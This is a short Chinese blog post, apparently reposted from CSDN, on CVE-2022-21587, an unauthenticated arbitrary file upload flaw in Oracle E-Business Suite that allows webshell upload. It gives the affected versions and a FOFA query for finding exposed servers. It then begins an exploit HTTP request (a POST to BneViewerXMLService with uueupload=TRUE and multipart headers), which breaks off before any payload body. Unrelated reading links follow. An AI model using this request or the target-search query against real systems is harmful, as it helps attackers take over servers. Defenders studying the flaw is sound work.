-
Oracle E-Business Suite软件 任意文件上传漏洞(CVE-2022-21587)
0x01 产品简介
Oracle E-Business Suite(电子商务套件)是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。
0x02 漏洞概述
Oracle E-Business Suite 的 Oracle Web Applications Desktop Integrator 接口BneViewerXMLService处存在任意文件上传漏洞,未经身份验证的攻击者通过上传恶意的webshell文件,获取服务器权限。
0x03 影响范围
Oracle Web Applications Desktop Integrator 12.2.3-12.2.11版本
0x04 复现环境
FOFA:app="Oracle-E-Business-Suite"
0x05 漏洞复现
Exp
- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
- Host: your-ip
- Accept-Encoding: gzip
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0
-
相关阅读:
C++智能指针原理与实现
基于 PyTorch 和神经网络给 GirlFriend 制作漫画风头像
深度学习微调
F. Kirei and the Linear Function(思维 + 哈希 + 预处理)
编写基于maven的IDEA插件,实现根据现有代码生成流程图 pom
工作流与BPM的区别
搭建nfs服务器
ASP.NET Core 6框架揭秘实例演示[04]:自定义依赖注入框架
[PHP]写个简单的分页静态接口用宝塔部署到Nginx
TCP通信-实现 1 发 1 收
- 原文地址:https://blog.csdn.net/qq_41904294/article/details/134697875